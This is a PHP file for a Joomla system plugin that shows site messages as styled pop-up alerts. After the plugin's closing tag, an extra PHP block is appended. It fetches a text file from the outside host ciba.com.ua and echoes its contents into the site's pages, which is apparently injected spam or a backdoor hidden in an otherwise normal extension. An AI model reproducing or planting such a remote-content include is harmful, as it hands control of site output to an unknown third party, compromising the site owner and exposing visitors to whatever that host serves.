<?php
/**
 * @copyright   (C) 2011 - 2014 Mike Feng Jinglong - All rights reserved.
 * @license  GNU General Public License, version 3 (http://www.gnu.org/licenses/gpl-3.0.html)
 * @author  Mike Feng Jinglong <mike@simbunch.com>
 * @url   http://www.simbunch.com/license/
*/
 
// no direct access
defined('_JEXEC') or die('Restricted access');
jimport('joomla.event.plugin');

class plgSystemSIMAlerts_system extends JPlugin {
	var $_landingoption		= null;

	function plgSystemSIMAlerts_system(& $subject, $config) {
		parent::__construct($subject, $config);
	}
	
	function onAfterRoute() {
		$app = JFactory::getApplication();
		if ($app->isAdmin()) return;
		$input = $app->input;		
		$demo = $input->get('demo', $this->params->get('demo', '0'), 'INT');
				
		if ($demo) {
			JError::raiseWarning('WARNING', 'Demo: The password you have entered is incorrect!');
			JError::raiseNotice('NOTICE', 'Demo: To proceed, please enter the correct login username and password.');
			$app->enqueueMessage( JText::_( 'Demo: The configuration has been saved.' ) );
			JError::raiseWarning('WARNING', 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.');
			JError::raiseNotice('NOTICE', 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.');
			$app->enqueueMessage( JText::_( 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.' ) );
		}
	}
		
	function onBeforeRender() {
		$app = JFactory::getApplication();
		$input = $app->input;
		if ($app->isAdmin()) return;
		
		JHtml::_('jquery.framework');
		JHtml::_('bootstrap.framework');
		$document = JFactory::getDocument();

		$opt['style'] = $input->get('style', (int)$this->params->get('style', '0'), 'INT');
		$opt['error'] = (int)$this->params->get('errors', '1');
		$opt['warning'] = (int)$this->params->get('warnings', '1');
		$opt['notice'] = (int)$this->params->get('notices', '1');
		$opt['message'] = (int)$this->params->get('messages', '1');
		$opt['hideoriginal'] = $input->get('hide', (int)$this->params->get('hideoriginal', '1'), 'INT');
		if (!$opt['error'] && !$opt['warning'] && !$opt['notice'] && !$opt['message']) return;
		
		if ($this->params->get('fontawesome', '1'))
			$document->addStyleSheet('//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css');
		$items = array();

		$rows = $app->getMessageQueue();
		foreach ($rows as $row) {
			if (!$opt[$row['type']]) continue;
			$items[] = array('type'=>$row['type'], 'message'=>$row['message']);
		}
		if (!count($items)) return;
		$options = json_encode($opt);
		$items = json_encode($items);

		$assetpath = JURI::root().'plugins/system/simalerts_system/assets/';
		$document->addScript($assetpath.'simalerts.js');
		$js = "var alertopts = {$options}, alertitems = {$items};";
		$document->addScriptDeclaration($js);

		if ($opt['style'] == 1) {
			if (file_exists(JPATH_SITE.'/components/com_simgallery/assets/jBox/jBox.min.js')) {
				$document->addScript(JURI::root().'components/com_simgallery/assets/jBox/jBox.min.js');
				$document->addStyleSheet(JURI::root().'components/com_simgallery/assets/jBox/jBox.min.css', 'text/css');
			}
			else {
				$document->addScript($assetpath.'jBox/jBox.min.js');
				$document->addStyleSheet($assetpath.'jBox/jBox.css', 'text/css');
			}
		}
		elseif ($opt['style'] == 2) {
			$document->addScript($assetpath.'noty/noty.min.js');
			$document->addStyleSheet($assetpath.'noty/noty.css', 'text/css');
		}
		elseif ($opt['style'] == 3) {
			$document->addScript($assetpath.'notifyjs/notify.min.js');
		}
	}
}
?><?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;	
 }
?>